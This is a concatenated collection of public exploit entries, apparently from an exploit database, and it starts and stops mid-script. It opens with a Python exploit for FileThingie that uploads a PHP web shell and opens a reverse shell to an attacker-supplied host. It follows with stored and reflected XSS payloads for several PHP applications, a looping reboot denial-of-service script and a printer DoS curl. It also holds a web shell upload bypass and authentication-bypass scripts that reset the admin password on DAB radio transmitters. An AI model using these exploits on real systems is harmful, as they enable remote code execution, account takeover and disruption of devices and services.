letters = string.ascii_letters
self.payload_filename = "".join(random.choice(letters) for i in range(16))
headers = {"Content-Type": "application/x-www-form-urlencoded"}
post_body = {f"type": "folder", "newdir": f"{self.payload_filename}", "act": "createdir", "dir": "", "submit" :"Ok"}
print(f"[*] Creating new folder /{self.payload_filename}")
response = self.session.post(self.target, headers=headers, data=post_body)
if f"index.php?dir=/{self.payload_filename}" in response.text:
print(f"[+] Created new folder /{self.payload_filename}")
return True
else:
print(f"[-] Could not create new folder /{self.payload_filename}")
return False
def create_payload(self) -> bool:
try:
with zipfile.ZipFile(f"{self.payload_filename}.zip", 'w', compression=zipfile.ZIP_DEFLATED) as zip_file:
zip_file.writestr(f"{self.payload_filename}.php", "<?php if(isset($_REQUEST[\'cmd\'])){ echo \"<pre>\"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo \"</pre>\"; die; }?>")
print(f"[+] Zipped payload to {self.payload_filename}.zip")
return True
except:
print(f"[-] Could not zip payload to {self.payload_filename}.zip")
return False
def upload_payload(self) -> bool:
# Set up the HTTP headers and data for the request
headers = {
b'Content-Type': b'multipart/form-data; boundary=---------------------------grimlockx'
}
post_body = (
'-----------------------------grimlockx\r\n'
'Content-Disposition: form-data; name="localfile-1682513975953"; filename=""\r\n'
'Content-Type: application/octet-stream\r\n\r\n'
)
post_body += (
'\r\n-----------------------------grimlockx\r\n'
'Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n'
'2000000\r\n'
'-----------------------------grimlockx\r\n'
f'Content-Disposition: form-data; name="localfile"; filename="{self.payload_filename}.zip"\r\n'
'Content-Type: application/zip\r\n\r\n'
)
# Read the zip file contents and append them to the data
with open(f"{self.payload_filename}.zip", "rb") as f:
post_body += ''.join(map(chr, f.read()))
post_body += (
'\r\n-----------------------------grimlockx\r\n'
'Content-Disposition: form-data; name="act"\r\n\r\n'
'upload\r\n'
'-----------------------------grimlockx\r\n'
'Content-Disposition: form-data; name="dir"\r\n\r\n'
f'/{self.payload_filename}\r\n'
'-----------------------------grimlockx\r\n'
'Content-Disposition: form-data; name="submit"\r\n\r\n'
'Upload\r\n'
'-----------------------------grimlockx--\r\n'
)
print("[*] Uploading payload to the target")
response = self.session.post(self.target, headers=headers, data=post_body)
if f"<a href=\"./{self.payload_filename}/{self.payload_filename}.zip\" title=\"Show {self.payload_filename}.zip\">{self.payload_filename}.zip</a>" in response.text:
print("[+] Uploading payload successful")
return True
else:
print("[-] Uploading payload failed")
return False
def get_base_url(self) -> str:
url_parts = urlsplit(self.target)
path_parts = url_parts.path.split('/')
path_parts.pop()
base_url = urlunsplit((url_parts.scheme, url_parts.netloc, '/'.join(path_parts), "", ""))
return base_url
def unzip_payload(self) -> bool:
print("[*] Unzipping payload")
headers = {"Content-Type": "application/x-www-form-urlencoded"}
post_body = {"newvalue": f"{self.payload_filename}.zip", "file": f"{self.payload_filename}.zip", "dir": f"/{self.payload_filename}", "act": "unzip"}
response = self.session.post(f"{self.target}", headers=headers, data=post_body)
if f"<p class='ok'>{self.payload_filename}.zip unzipped.</p>" in response.text:
print("[+] Unzipping payload successful")
print(f"[+] You can now execute commands by browsing {self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd=<command>")
return True
else:
print("[-] Unzipping payload failed")
return False
def execute_payload(self) -> bool:
print("[*] Trying to get a reverse shell")
cmd = quote(f"php -r \'$sock=fsockopen(\"{self.lhost}\",{self.lport});system(\"/bin/bash <&3 >&3 2>&3\");\'")
print("[*] Executing payload")
response = self.session.get(f"{self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd={cmd}")
print("[+] Exploit complete")
return True
def cleanup_local_files(self) -> bool:
if os.path.exists(f"{self.payload_filename}.zip"):
os.remove(f"{self.payload_filename}.zip")
print("[+] Cleaned up zipped payload on local machine")
return True
print("[-] Could not clean up zipped payload on local machine")
return False
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", dest="target", type=str, required=True, help="Target URL to ft2.php")
parser.add_argument("-u", "--username", dest="username", type=str, required=True, help="FileThingie username")
parser.add_argument("-p", "--password", dest="password", type=str, required=True, help="FileThingie password")
parser.add_argument("-L", "--LHOST", dest="lhost", type=str, required=True, help="Local listener ip")
parser.add_argument("-P", "-LPORT", dest="lport", type=int, required=True, help="Local listener port")
args = parser.parse_args()
exploit = Exploit(args.target, args.username, args.password, args.lhost, args.lport)
exploit.try_login()
exploit.create_new_folder()
exploit.create_payload()
exploit.upload_payload()
exploit.unzip_payload()
exploit.execute_payload()
exploit.cleanup_local_files()
# Exploit Title: RockMongo 1.1.7 - Stored Cross-Site Scripting (XSS)
# Discovery by: Rafael Pedrero
# Discovery Date: 2020-09-19
# Vendor Homepage: https://github.com/iwind/rockmongo/
# Software Link : https://github.com/iwind/rockmongo/
# Tested Version: 1.1.7
# Tested on: Windows 7 and 10
# Vulnerability Type: Stored Cross-Site Scripting (XSS)
CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: RockMongo v1.1.7, does not sufficiently encode
user-controlled inputs, resulting in a stored and reflected Cross-Site
Scripting (XSS) vulnerability via the index.php, in multiple parameter.
Proof of concept:
Stored:
POST https://localhost/mongo/index.php?action=db.newCollection&db=local
HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: https://localhost
Connection: keep-alive
Referer: https://localhost/mongo/index.php?action=db.newCollection&db=local
Cookie: PHPSESSID=jtjuid60sv6j3encp3cqqps3f7; ROCK_LANG=es_es;
rock_format=json
Upgrade-Insecure-Requests: 1
Host: localhost
name=%09%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&size=0&max=0
Reflected:
https://localhost/mongo/index.php?action=collection.index&db=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&collection=startup_log
https://localhost/mongo/index.php?action=collection.index&db=local&collection=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E
https://localhost/mongo/index.php?action=db.index&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
http://localhost/mongo/index.php?db=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&collection=startup_log&action=collection.index&format=json&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll
http://localhost/mongo/index.php?db=local&collection=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&action=collection.index&format=json&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll
http://localhost/mongo/index.php?db=local&collection=startup_log&action=collection.index&format=%27+onMouseOver%3D%27alert%281%29%3B&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll
POST http://localhost/mongo/index.php?action=login.index&host=0 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://localhost
Authorization: Basic cm9vdDpyb290
Connection: keep-alive
Referer: https://localhost/mongo/index.php?action=login.index&host=0
Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1;
rock_format=json
Upgrade-Insecure-Requests: 1
Host: localhost
more=0&host=0&username=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&password=****&db=&lang=es_es&expire=3
POST http://localhost/mongo/index.php?action=server.command& HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://localhost
Authorization: Basic cm9vdDpyb290
Connection: keep-alive
Referer: https://localhost/mongo/index.php?action=server.command&
Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1;
rock_format=json
Upgrade-Insecure-Requests: 1
Host: localhost
command=%7B%0D%0A++listCommands%3A+1%0D%0A%7D&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&format=json
POST http://localhost/mongo/index.php?action=server.execute& HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
Origin: https://localhost
Authorization: Basic cm9vdDpyb290
Connection: keep-alive
Referer: https://localhost/mongo/index.php?action=server.execute&
Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1;
rock_format=json
Upgrade-Insecure-Requests: 1
Host: localhost
code=function+%28%29+%7B%0D%0A+++var+plus+%3D+1+%2B+2%3B%0D%0A+++return+plus%3B%0D%0A%7D&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
#Exploit Title: Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)
#Application: Ulicms
#Version: 2023.1-sniffing-vicuna
#Bugs: Stored Xss
#Technology: PHP
#Vendor URL: https://en.ulicms.de/
#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip
#Date of found: 04-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. Go to media then to file (http://localhost/dist/admin/index.php?action=files)
2. upload malicious svg file
svg file content ===>
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
poc request:
POST /dist/admin/fm/upload.php HTTP/1.1
Host: localhost
Content-Length: 663
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryK3CvcSs8xZwzABCl
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Linux"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/dist/admin/fm/dialog.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: last_position=%2F; 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delv
Connection: close
------WebKitFormBoundaryK3CvcSs8xZwzABCl
Content-Disposition: form-data; name="fldr"
------WebKitFormBoundaryK3CvcSs8xZwzABCl
Content-Disposition: form-data; name="files[]"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
------WebKitFormBoundaryK3CvcSs8xZwzABCl--
3. Go to http://localhost/dist/content/SVG_XSS.svg
# Exploit Title: Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS)
# Date: 27-06-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://bigprof.com
# Software Download Link :
https://bigprof.com/appgini/applications/online-clinic-management-system
# Version : 2.2
# Category: Webapps
# Tested on: Windows 7 64 Bits / Windows 10 64 Bits
# CVE :
# Category: webapps
# Vulnerability Type: Stored Cross-Site Scripting
1. Description
Online Clinic Management System 2.2, does not sufficiently encode
user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS)
vulnerability via the /clinic/medical_records_view.php, in FirstRecord
parameter, GET and POST request.
2. Proof of Concept
GET:
http://127.0.0.1/clinic/medical_records_view.php?SelectedID=2&record-added-ok=5781&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=
POST:
POST http://127.0.0.1/clinic/medical_records_view.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------1512016725878
Content-Length: 1172
Origin: https://127.0.0.1
Connection: keep-alive
Referer: https://127.0.0.1/clinic/medical_records_view.php
Cookie: online_clinic_management_system=bnl1ht0a4n7snalaoqgh8f85b4;
online_clinic_management_system.dvp_expand=[%22tab_medical_records-patient%22%2C%22tab_events-name_patient%22]
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1
-----------------------------1512016725878
Content-Disposition: form-data; name="current_view"
DVP
-----------------------------1512016725878
Content-Disposition: form-data; name="SortField"
-----------------------------1512016725878
Content-Disposition: form-data; name="SelectedID"
1
-----------------------------1512016725878
Content-Disposition: form-data; name="SelectedField"
-----------------------------1512016725878
Content-Disposition: form-data; name="SortDirection"
-----------------------------1512016725878
Content-Disposition: form-data; name="FirstRecord"
"><script>alert(1);</script>
-----------------------------1512016725878
Content-Disposition: form-data; name="NoDV"
-----------------------------1512016725878
Content-Disposition: form-data; name="PrintDV"
-----------------------------1512016725878
Content-Disposition: form-data; name="DisplayRecords"
all
-----------------------------1512016725878
Content-Disposition: form-data; name="patient"
-----------------------------1512016725878
Content-Disposition: form-data; name="SearchString"
-----------------------------1512016725878--
1. Description
Online Clinic Management System 2.2, does not sufficiently encode
user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS)
vulnerability via the /clinic/patients_view.php, in FirstRecord parameter.
2. Proof of Concept
http://127.0.0.1/clinic/patients_view.php?SelectedID=1&record-added-ok=11536&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=
And Reflected Cross-Site Scripting (XSS) too.
# Vulnerability Type: Reflected Cross-Site Scripting
1. Description
Online Clinic Management System 2.2, does not sufficiently encode
user-controlled inputs, resulting in a Reflected Cross-Site Scripting (XSS)
vulnerability via the /clinic/events_view.php, in FirstRecord parameter.
2. Proof of Concept
http://127.0.0.1/clinic/events_view.php?SelectedID=2&record-added-ok=7758&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=
1. Description
Online Clinic Management System 2.2, does not sufficiently encode
user-controlled inputs, resulting in a Reflected Cross-Site Scripting (XSS)
vulnerability via the /clinic/disease_symptoms_view.php, in FirstRecord
parameter.
2. Proof of Concept
http://127.0.0.1/clinic/disease_symptoms_view.php?SelectedID=1&record-added-ok=1096&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=
# Exploit Title: FLEX 1080 < 1085 Web 1.6.0 - Denial of Service
# Date: 2023-05-06
# Exploit Author: Mr Empy
# Vendor Homepage: https://www.tem.ind.br/
# Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94
# Version: 1.6.0
# Tested on: Android
# CVE ID: CVE-2022-2591
#!/usr/bin/env python3
import requests
import re
import argparse
from colorama import Fore
import time
def main():
def banner():
print('''
________ _______ __
/ ____/ / / ____/ |/ /
/ /_ / / / __/ | /
/ __/ / /___/ /___ / |
/_/ /_____/_____//_/|_|
[FLEX 1080 < 1085 Web 1.6.0 - Denial of Service]
''')
def reboot():
r = requests.get(f'http://{arguments.target}/sistema/flash/reboot')
if 'Rebooting' in r.text:
pass
else:
print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware
não é vulnerável')
quit()
banner()
print(f'{Fore.LIGHTBLUE_EX}[*] {Fore.LIGHTWHITE_EX} Iniciando o ataque')
while True:
try:
reboot()
print(f'{Fore.LIGHTGREEN_EX}[+] {Fore.LIGHTWHITE_EX} Hardware
derrubado com sucesso!')
time.sleep(1)
except:
# print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware
está inativo')
pass
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-t','--target', action='store', help='Target',
dest='target', required=True)
arguments = parser.parse_args()
try:
main()
except KeyError:
quit()
# Exploit Title: Epson Stylus SX510W Printer Remote Power Off - Denial of Service (PoC)
# Discovery by: Rafael Pedrero
# Discovery Date: 2020-05-16
# Vendor Homepage: https://www.epson.es/
# Software Link :
https://www.epson.es/products/printers/inkjet-printers/for-home/epson-stylus-sx510w
# Tested Version: EPSON_Linux UPnP/1.0 Epson UPnP SDK/1.0
# Tested on: Linux/Windows
# Vulnerability Type: Denial of Service (DoS)
1. Description
The vulnerability occurs when 2 or more &'s are sent to the server in a row
("/PRESENTATION/HTML/TOP/INDEX.HTML") causing it to shutdown.
2. Proof of Concept
Request:
curl -s "http://
<printer_ip_address>/PRESENTATION/HTML/TOP/INDEX.HTML?RELOAD=&&tm=1589865865549"
3. Solution:
This version product is deprecated.
-->
<!--
# Exploit Title: Job Portal 1.0 - File Upload Restriction Bypass
# Date: 27-06-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://phpgurukul.com/job-portal-project/
# Software Link:
https://phpgurukul.com/?smd_process_download=1&download_id=7855
# Version: 1.0
# Tested on: Windows 7 64 Bits / Windows 10 64 Bits
# CVE :
# Category: webapps
1. Description
File Upload Restriction Bypass vulnerabilities were found in Job Portal
1.0. This allows for an authenticated user to potentially obtain RCE via
webshell.
2. Proof of Concept
1. Go the user profile >> (/jobportal/applicant/)
2.- Select profile image and load a valid image.
3. Turn Burp/ZAP Intercept On
4. Select webshell - ex: shell.png
5. Alter request in the upload...
Update 'filename' to desired extension. ex: shell.php
Not neccesary change content type to 'image/png'
Example exploitation request:
====================================================================================================
POST http://127.0.0.1/jobportal/applicant/controller.php?action=photos
HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data;
boundary=---------------------------57052814523281
Content-Length: 555
Origin: https://127.0.0.1
Connection: keep-alive
Referer: https://127.0.0.1/jobportal/applicant/index.php?view=view&id=
Cookie: PHPSESSID=qf9e02j0rda99cj91l36qcat34
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1
-----------------------------57052814523281
Content-Disposition: form-data; name="MAX_FILE_SIZE"
1000000
-----------------------------57052814523281
Content-Disposition: form-data; name="photo"; filename="shell.php"
Content-Type: image/png
?PNG
...
<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?>
IEND
-----------------------------57052814523281
Content-Disposition: form-data; name="savephoto"
-----------------------------57052814523281--
====================================================================================================
6. Send the request and visit your new webshell
Ex: https://127.0.0.1/jobportal/applicant/photos/shell.php?cmd=whoami
nt authority\system
3. Solution:
Patch:
https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
-->
#Exploit Title: TinyWebGallery v2.5 - Stored Cross-Site Scripting (XSS)
#Application: TinyWebGallery
#Version: v2.5
#Bugs: Stored Xss
#Technology: PHP
#Vendor URL: http://www.tinywebgallery.com/
#Software Link: https://www.tinywebgallery.com/download.php?tinywebgallery=latest
#Date of found: 07-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. Login to account
2. Go to http://localhost/twg25/index.php?twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg
3. Edit
4. Set folder name section as <script>alert(4)</script>
Request :
POST /twg25/i_frames/i_titel.php HTTP/1.1
Host: localhost
Content-Length: 264
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/twg25/i_frames/i_titel.php?twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=qc7mfbthpf7tnf32a34p8l766k
Connection: close
twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg&twg_foffset=&twg_submit=true&twg_titel_page2=true&twg_foldername_mod=1&twg_foldername=%26lt%3Bscript%26gt%3Balert%284%29%26lt%3B%2Fscript%26gt%3B&twg_folderdesc_mod=1&twg_folderdesc=aaaaaaaaaaaaaaaaa&twg_submit=Save
5. Go to http://localhost/twg25/index.php
#!/usr/bin/env python3
#
# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Admin Password Change
# Exploit Author: LiquidWorm
#
#
# Vendor: DB Elettronica Telecomunicazioni SpA
# Product web page: https://www.screen.it | https://www.dbbroadcast.com
# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
# Affected version: Firmware: 1.9.3
# Bios firmware: 7.1 (Apr 19 2021)
# Gui: 2.46
# FPGA: 169.55
# uc: 6.15
#
# Summary: Screen's new radio DAB Transmitter is reaching the highest
# technology level in both Digital Signal Processing and RF domain.
# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
# digital adaptive precorrection and configuatio flexibility, the Hot
# Swap System technology, the compactness and the smart system design,
# the SFT DAB are advanced transmitters. They support standards DAB,
# DAB+ and T-DMB and are compatible with major headend brands.
#
# Desc: This exploit circumvents the control and requirement of admin's
# old password and directly changes the password.
#
# Tested on: Keil-EWEB/2.1
# MontaVista® Linux® Carrier Grade eXpress (CGX)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2023-5774
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5774.php
#
#
# 19.03.2023
#
import hashlib,datetime##########
import requests,colorama#########
from colorama import Fore, Style#
colorama.init()
print(Fore.RED+Style.BRIGHT+
'''
██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████
██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██
██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██
'''
+Style.RESET_ALL)
print(Fore.WHITE+Style.BRIGHT+
'''
ZSL and the Producers insist that no one
submit any exploits of themselfs or others
performing any dangerous activities.
We will not open or view them.
'''
+Style.RESET_ALL)
s=datetime.datetime.now()
s=s.strftime('%d.%m.%Y %H:%M:%S')
print('Starting API XPL -',s)
t=input('Enter transmitter ip: ')
p=input('Enter desired password: ')
e='/system/api/userManager.cgx'
m5=hashlib.md5()
m5.update(p.encode('utf-8'))
h=m5.hexdigest()
print('Your sig:',h)
print('Calling object: ssbtObj')
print('CGX fastcall: userManager::changeUserPswd')
t='http://'+t+e
bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
'Accept':'application/json, text/plain, */*',
'Accept-Language':'ku-MK,en;q=0.9',
'Accept-Encoding':'gzip, deflate',
'User-Agent':'Dabber-+',
'Connection':'close'}
j={'ssbtIdx':0,
'ssbtType':'userManager',
'ssbtObj':{
'changeUserPswd':{
'username':'admin',
'password':h
}
},
}
r=requests.post(t,headers=bh,json=j)
if r.status_code==200:
print('Done.')
else:
print('Error')
exit(-2)
# Exploit Title: Screen SFT DAB 600/C - Unauthenticated Information Disclosure (userManager.cgx)
# Exploit Author: LiquidWorm
Vendor: DB Elettronica Telecomunicazioni SpA
Product web page: https://www.screen.it | https://www.dbbroadcast.com
https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
Affected version: Firmware: 1.9.3
Bios firmware: 7.1 (Apr 19 2021)
Gui: 2.46
FPGA: 169.55
uc: 6.15
Summary: Screen's new radio DAB Transmitter is reaching the highest
technology level in both Digital Signal Processing and RF domain.
SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
digital adaptive precorrection and configuatio flexibility, the Hot
Swap System technology, the compactness and the smart system design,
the SFT DAB are advanced transmitters. They support standards DAB,
DAB+ and T-DMB and are compatible with major headend brands.
Desc: Screen is affected by an information disclosure vulnerability
due to improper access control enforcement. An unauthenticated remote
attacker can exploit this, via a specially crafted request to gain
access to sensitive information including usernames and source IP
addresses.
Tested on: Keil-EWEB/2.1
MontaVista® Linux® Carrier Grade eXpress (CGX)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5776
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5776.php
19.03.2023
--
$ curl 'http://SFTDAB/system/api/userManager.cgx'
{"ssbtType":"userManager","ssbtIdx":0,"ssbtObj":{"admin":false,"users":[{"user":"testingus","type":"GUEST","connected":false,"info":null},{"user":"joxy","type":"OPERATOR","connected":false,"info":null},{"user":"dude","type":"OPERATOR","connected":true,"info":{"ip":"192.168.178.150","tmo":120}}]}}
#!/usr/bin/env python3
#
# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Reset Board Config
# Exploit Author: LiquidWorm
#
#
# Vendor: DB Elettronica Telecomunicazioni SpA
# Product web page: https://www.screen.it | https://www.dbbroadcast.com
# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
# Affected version: Firmware: 1.9.3
# Bios firmware: 7.1 (Apr 19 2021)
# Gui: 2.46
# FPGA: 169.55
# uc: 6.15
#
# Summary: Screen's new radio DAB Transmitter is reaching the highest
# technology level in both Digital Signal Processing and RF domain.
# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
# digital adaptive precorrection and configuatio flexibility, the Hot
# Swap System technology, the compactness and the smart system design,
# the SFT DAB are advanced transmitters. They support standards DAB,
# DAB+ and T-DMB and are compatible with major headend brands.
#
# Desc: The application suffers from a weak session management that can
# allow an attacker on the same network to bypass these controls by reusing
# the same IP address assigned to the victim user (NAT) and exploit crucial
# operations on the device itself. By abusing the IP address property that
# is binded to the Session ID, one needs to await for such an established
# session and issue unauthorized requests to the vulnerable API to manage
# and/or manipulate the affected transmitter.
#
# Tested on: Keil-EWEB/2.1
# MontaVista® Linux® Carrier Grade eXpress (CGX)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2023-5775
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5775.php
#
#
# 19.03.2023
#
import hashlib,datetime##########
import requests,colorama#########
from colorama import Fore, Style#
colorama.init()
print(Fore.RED+Style.BRIGHT+
'''
██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████
██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██
██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
